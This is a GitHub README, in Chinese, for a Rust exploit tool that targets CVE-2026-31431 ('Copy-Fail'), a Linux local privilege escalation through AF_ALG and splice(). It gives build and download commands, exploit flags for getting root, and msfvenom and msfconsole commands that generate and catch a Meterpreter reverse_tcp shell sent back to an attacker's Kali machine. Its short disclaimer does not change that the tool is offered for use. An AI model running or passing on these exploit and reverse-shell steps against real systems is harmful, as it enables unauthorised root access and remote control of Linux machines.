iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail

GitHub: iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail

CVE-2026-31431 Linux 本地提权漏洞的 Rust 利用工具,支持自定义 shellcode 执行以获取 root 权限。

Stars: 35 | Forks: 10

# CVE-2026-31431 - Linux Copy-Fail 漏洞利用 (Rust) CVE-2026-31431 (Copy-Fail) 本地权限提升漏洞利用的 Rust 实现。 它允许执行自定义的 shellcode(例如 **Meterpreter**)

# 简介 Xint 披露了 CVE-2026-31431,这是一个任意页面缓存写入漏洞,通过链接 `AF_ALG` 和 `splice()` 实现了 4 字节写入原语。 来源:[Copy Fail: 732 Bytes to Root on Every Major Linux Distribution](https://xint.io/blog/copy-fail-linux-distributions) # 免责声明 本项目是作为我个人研究网络安全兴趣的一部分而开发的。然而,它有可能被滥用于恶意目的。 请勿将此工具用于任何非法活动。 作者不对本软件的任何滥用行为负责。 # 鸣谢 - [theori-io/copy-fail-CVE-2026-31431](https://github.com/theori-io/copy-fail-CVE-2026-31431) # 如何编译 克隆项目,然后执行 `build.sh`: ``` git clone git@github.com:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail cd ./CVE-2026-31431-Linux-Copy-Fail chmod +x ./build.sh ./build.sh ``` # 使用方法 下载并解压 release 包: ``` wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz tar -xzf CVE-2026-31431-Linux-Fail.gz chmod +x CVE-2026-31431-Linux-Copy-Fail_x64 chmod +x CVE-2026-31431-Linux-Copy-Fail_x86 ``` 二进制文件提供以下选项: ``` ./CVE-2026-31431-Linux-Copy-Fail --test ./CVE-2026-31431-Linux-Copy-Fail --exploit ./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin ``` # 演示 ## 测试漏洞 在存在漏洞的机器上: ``` ./CVE-2026-31431-Linux-Copy-Fail --test ```

## 漏洞利用 ``` ./CVE-2026-31431-Linux-Copy-Fail --exploit ```

## Meterpreter 使用以下命令(将 **PrependSetUid** 设置为 `True`)生成 **Meterpreter** payload: ``` msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin ``` 在攻击者机器 (Kali Linux) 上: ``` msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.1.x set lport 4444 run ``` 在存在漏洞的机器上: ``` ./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin ```

# 受影响版本 - [Ubuntu](https://ubuntu.com/security/CVE-2026-31431) - [Redhat](https://access.redhat.com/security/cve/cve-2026-31431)
标签:AF_ALG, CVE-2026-31431, Exploit, Linux漏洞, Meterpreter, PoC, Rust, Shellcode, splice, Web报告查看器, 二进制漏洞利用, 任意写入, 内核漏洞, 可视化界面, 子域名枚举, 安全渗透, 技术调研, 提权利用, 攻击路径可视化, 暴力破解, 本地提权, 系统安全, 网络安全, 网络流量审计, 通知系统, 隐私保护, 页缓存, 黑客工具